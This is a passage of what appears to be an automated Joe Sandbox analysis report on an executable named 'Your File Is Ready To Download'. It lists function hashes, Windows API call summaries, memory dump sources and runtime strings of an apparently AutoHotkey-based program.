                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F86182362117808AFB229F26D8447ED37A4FB5CBD9F444A25FB1A43BA4DB38C546CB10
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientRectScreenWindow
                                                                                                                                                                                                                          • String ID: %sH$%sW$%sX$%sY
                                                                                                                                                                                                                          • API String ID: 3371951266-2562685033
                                                                                                                                                                                                                          • Opcode ID: bc82f905009b77a62bb31107895c40c7e390511d45abf6b6e99bd73b49d6bcec
                                                                                                                                                                                                                          • Instruction ID: 9253a86bf2e2f7b2fa3bc5bc0c425d991e222e72b6d8bd8635e38316f02d8bf7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc82f905009b77a62bb31107895c40c7e390511d45abf6b6e99bd73b49d6bcec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DB1B372205A9496EB129B22E4403DE7771F78CBC8F544216EF4957BA9DB38CA46CB00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CreateDestroyProp$DialogIndirectLongObjectParamReleaseSelect
                                                                                                                                                                                                                          • String ID: Can't create control.$SysTabControl32$ahk_autosize
                                                                                                                                                                                                                          • API String ID: 29589847-4181254606
                                                                                                                                                                                                                          • Opcode ID: 74cc7cad9a738b0361d60ecb49be3d7f814d15f21886881410eacf04b87b4641
                                                                                                                                                                                                                          • Instruction ID: 1364cb5db60d1f60d85a50140ff98cd2741dc2b13429e4b8d27b588a5c2a2b57
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74cc7cad9a738b0361d60ecb49be3d7f814d15f21886881410eacf04b87b4641
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9410276205B8089EB52CF26E8407DD77A1FB4CBD8F448126EB89877B8DB38CA55C710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                          • String ID: $Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 1799206407-1193006554
                                                                                                                                                                                                                          • Opcode ID: 3b0f9a30385456ffea777a7922df2156320e05e1b533d5d03ce35d0fca5d937f
                                                                                                                                                                                                                          • Instruction ID: d041bf3108b29fd9304b420ba69acdcfbdfe623088ca005a06f2f89967b6b636
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b0f9a30385456ffea777a7922df2156320e05e1b533d5d03ce35d0fca5d937f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35A1E532204B9185FB639B32EC143EA6352A79DBD4F684A11EF1E4B7E5DB78C545C340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$CreateObjectReleaseSelectWindow
                                                                                                                                                                                                                          • String ID: Can't create control.$msctls_progress32
                                                                                                                                                                                                                          • API String ID: 3196501506-3641780397
                                                                                                                                                                                                                          • Opcode ID: e54280de3c0299e973b6deb5d1520ab1b1f8caa96f18f3775e4cabc5cf6be609
                                                                                                                                                                                                                          • Instruction ID: 1a151c4c545600617cd5c0c717128ee3613ae3cfbde3217d56f83d3d183570e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e54280de3c0299e973b6deb5d1520ab1b1f8caa96f18f3775e4cabc5cf6be609
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8931F676305A8089EB52CB66E8407DD63A1F74CBD8F549025EF4957BB8DB38C985C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __doserrno_close_nolock_errno
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 186997739-0
                                                                                                                                                                                                                          • Opcode ID: bb16f57f56811ea002edbd08b35f8f9acba78d02a911a08bd865d1ae7e7ae3c0
                                                                                                                                                                                                                          • Instruction ID: 286b99a2c20da3a1b26cc9f8c746837a5edaaf3fec2c9efb139c8532c88af651
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb16f57f56811ea002edbd08b35f8f9acba78d02a911a08bd865d1ae7e7ae3c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D11B67260464455F21B6F67A8453ED3A50AFAC7E4F5A4626B72A073F3C7B88482D324
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsSystemWindow$CursorFromMessagePointProcessSendThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4190604185-0
                                                                                                                                                                                                                          • Opcode ID: 001d2751f2c0ea23dba788a95f0842c70af3d7cc0185038278cbc76d6c2aa86e
                                                                                                                                                                                                                          • Instruction ID: f68d589ceef57119e54cbea6f95dd4c548601844e37f4ebe32dae1eded86cfa3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 001d2751f2c0ea23dba788a95f0842c70af3d7cc0185038278cbc76d6c2aa86e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8391C031614A8486FBB79B17A4407E977A1B79DBC0F484105FF861FAF4DB7ACA858B00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: EndKey$EndKey:$sc%03X
                                                                                                                                                                                                                          • API String ID: 0-2517657595
                                                                                                                                                                                                                          • Opcode ID: 39c4e2e22996cb116458ec8c947a5597aa053a58d494e28869eb96fd358e2ddc
                                                                                                                                                                                                                          • Instruction ID: 1669263bb4439b1d73c09b5e351fe04a41c149b66bbc0d45e08e094a132f21bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39c4e2e22996cb116458ec8c947a5597aa053a58d494e28869eb96fd358e2ddc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2041B17A60479084EB769F22A5403EFABA4F74D7C8F444426FF8803AB9DB79C486C304
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFreeLock
                                                                                                                                                                                                                          • String ID: GlobalAlloc$GlobalLock
                                                                                                                                                                                                                          • API String ID: 1811133220-3672399903
                                                                                                                                                                                                                          • Opcode ID: a4f84c14dbdc6ce199a6a28741ac3d95d06f8992587bbe360abfb62017ea737f
                                                                                                                                                                                                                          • Instruction ID: aafdd01c5fb274af8b0df55ea84b20a7f0fca004a30534e934bffe71acb77ac4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4f84c14dbdc6ce199a6a28741ac3d95d06f8992587bbe360abfb62017ea737f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05114F71200B4181EF4ADF26F4913D963A0EB5CBC8F589026EB0D473B9EE38C995C340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: State$Window$ForegroundProcessThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2921243749-0
                                                                                                                                                                                                                          • Opcode ID: 6a64c37a2b1d70977339c9663a3d8ecc06e0a23c3fd23c235067eab5c63bd4dc
                                                                                                                                                                                                                          • Instruction ID: 91e3832c4513c6cfed92585211f6386d2bf043fe89ee51a33a13ce67df379b64
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a64c37a2b1d70977339c9663a3d8ecc06e0a23c3fd23c235067eab5c63bd4dc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E31F03260469086F3769B2AB4427DE77A1E78DBD4F180108FB950BAF6DB3AD445CB10
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLast$CloseCreateHandleTime
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1269242970-0
                                                                                                                                                                                                                          • Opcode ID: a4f59ac87be66cdac9b1ccc389bdead8c9e68ff9f944a8621786228ad0dbf133
                                                                                                                                                                                                                          • Instruction ID: 7fc5b71f0cb69264bc5ca248ec7cdbd893a6823ec1c1e07e86a03c6b67555fcc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4f59ac87be66cdac9b1ccc389bdead8c9e68ff9f944a8621786228ad0dbf133
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F221F23160078082F3629B27B944BADA291B78CBE4F204B20FF5983BE4EF38C4428710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProcessWindow$CountMessageTick$CloseHandleOpenPostSendTerminateThreadTimeout
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1366898224-0
                                                                                                                                                                                                                          • Opcode ID: 460b27a332e21d933ca3d1d8fcb56fdead7a4a90c52796f97ca23ca4001451f9
                                                                                                                                                                                                                          • Instruction ID: 9a3fbae626195b665d6fbbda2c64832f1b660cdd77e230333fc93a859af33721
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 460b27a332e21d933ca3d1d8fcb56fdead7a4a90c52796f97ca23ca4001451f9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2911A032724A8082FB566F63B4543EE12B0ABCCBC4F481034BB17077A9DE78C8828640
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CD0CE
                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CD0DC
                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CD134
                                                                                                                                                                                                                            • Part of subcall function 00000001400CF2B4: Sleep.KERNEL32(?,?,00000000,00000001400CD0F7,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CF2F9
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CD108
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00000001400CD11C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLastValue_lock$CurrentSleepThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2194181773-0
                                                                                                                                                                                                                          • Opcode ID: ab2ca03aca749694637dba0d4c81b756c42c5197dec300c3b9876d02556c3a1e
                                                                                                                                                                                                                          • Instruction ID: 370f77ef9231c3825b5d90093b6aeef87ff55cb95a05fd2b6783cb5157d9e728
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab2ca03aca749694637dba0d4c81b756c42c5197dec300c3b9876d02556c3a1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6201483520574182FB5ABF67A4453ED3251AF8CBE0F184629FF66433F5EE38D4469610
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00000001400673E0: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000001400483D2), ref: 0000000140067413
                                                                                                                                                                                                                            • Part of subcall function 00000001400673E0: IsWindowVisible.USER32 ref: 0000000140067434
                                                                                                                                                                                                                          • GetClassNameW.USER32 ref: 000000014004F169
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ClassForegroundNameVisible
                                                                                                                                                                                                                          • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 3743660214-457448710
                                                                                                                                                                                                                          • Opcode ID: b3cab7a5c7db19a0d270428c9dabe85673806a880ad8fb6730f62affe00b6ec1
                                                                                                                                                                                                                          • Instruction ID: bde0d5ddba9273085413816da81cce9ab286fa124f309a9c3bc649662609a414
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3cab7a5c7db19a0d270428c9dabe85673806a880ad8fb6730f62affe00b6ec1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5291F472604B8085FB229F22D5043F96362E79CBD8F554232EB5D177E9DBB8D942E308
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Out of memory.
